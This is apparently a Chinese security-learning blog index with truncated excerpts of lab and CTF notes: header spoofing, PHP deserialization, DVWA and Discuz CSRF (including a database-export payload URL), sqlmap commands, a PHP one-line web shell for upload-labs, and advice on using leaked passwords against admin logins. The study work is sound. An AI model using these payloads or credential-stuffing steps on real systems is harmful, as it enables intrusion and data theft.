笔试面试准备 a、信息收集 1.获取域名的whois信息,获取注册者邮箱姓名电话等,丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台。 用邮箱做关键词进行丢进搜索引擎。利用搜索到的关联信息找出其他邮箱进而得到常用社交账号。社工找出社交账号,里面或许会找出管理员设置密码的习惯 。利用已有信息生成专用字典。 查看服务器旁站及子域名站点,是否具又通用性漏洞 2、 2024-12-10
看到本地访问,我们很自然的相到,将X-Forwarded-For设为127.0.0.1点击登录,还是显示只能本地访问。我们尝试抓包,修改登陆时的post请求,同时加入X-Forwarded-For的值为127.0.0.1 1X-Forwarded-For:127.0.0.1 得到flag 2024-12-10
反序列化题目,题目代码如下 123456789101112131415161718192021222324252627282930313233<?php/** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */highlight_file(__FILE__);class BUU { 2024-12-10
docker使用 一、docker寻找镜像1docker search pikachu 二、拉取镜像1docker pull area39/pikachu 三、运行镜像1docker run --name piakchu -d -p 8000:80 area39/pikachu -p:指定映射端口-d:后台运行–name:命名 四、修改安全组策略 2024-12-09
DVWA CSRF修改密码(中等难度)伪造Refer绕过代码检查方法: 修改html文件名称,使refer路径名称包含host中的内容 修改文件夹名称,使refer路径中包含host中的内容token值每次都变化CSRF防护手段1.验证refer对于每一个请求验证其Referer值,验证refer值是否合法。他网站的话,2.验证token3.输入原密码,输入验证码 RCE 2024-12-07
Discuz论坛-CSRF脱库 通过构造如下请求,通过发帖插入超链接的方式进行 1http://192.168.187.145/DZ/upload/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=xxxx%26backupfilename%3Daaaa 管理员用户发送的备份请求通过插入图片超链接的方式,添加payload, 2024-12-07
复制 1python sqlmap.py -u "http://192.168.187.145/sql/Less-4/?id=2" --dbs 1python sqlmap.py -u "http://192.168.187.145/sql/Less-4/?id=2" -D security --tables 1python sqlm 2024-12-07
upload-lab-文件上传漏洞 基本原理利用文件上传存在的漏洞,向目标网站中上传一句话木马,然后可以在本地通过中国菜刀、蚁剑进行连接,连接后即可获取和控制整个网站目录。 最简单的一句话木马如下:<?php @eval($_POST['123']);?>@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['123']表示从页面中获 2024-10-18 #upload-lab #靶场 #学习